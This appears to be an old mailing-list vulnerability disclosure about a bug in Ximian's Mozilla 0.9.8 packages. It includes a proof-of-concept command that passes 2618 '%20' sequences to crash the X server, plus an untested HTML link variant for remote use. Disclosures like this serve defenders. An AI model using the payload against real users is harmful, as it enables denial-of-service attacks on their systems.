Ximian Mozilla: The 2618 Bug

["Replugge [Rod]" <replugge () alcoholico org>]

NOTE TO THE MODERATOR: This was sent yesterday but i guess didn't
make it since this doesn't seem to affect a redhat itself, it affects
the mozilla packages distrbuted by Ximian:

The test system look like:

bash#~ rpm -qa | grep mozilla
mozilla-0.9.8-1.ximian.2
mozilla-mail-0.9.8-1.ximian.2
mozilla-xmlterm-0.9.8-1.ximian.2
mozilla-devel-0.9.8-1.ximian.2
nautilus-mozilla-1.0.6-ximian.4
mozilla-psm-0.9.8-1.ximian.2
kdebindings-kmozilla-2.1.1-1

This was tested in both RH7.1 and 7.2 with Ximian Gnome.(with all the
the updates).


There is a bug in mozilla 0.9.8-1 which allows you
to Crash the X server.

I won't go into details I'll just show the proof
of concept.


exploit:

Local:
bash#~ mozilla `perl -e "print '%20' x 2618"`


Remote:
I haven't test this but i guess:

echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >>
./attack.html

perhaps using "img src" or java script...


Best Regards

-- 
/* 
Rodrigo Gutierrez                   <rodrigo () trustix com>
Trustix AS                         http://www.trustix.com 
*/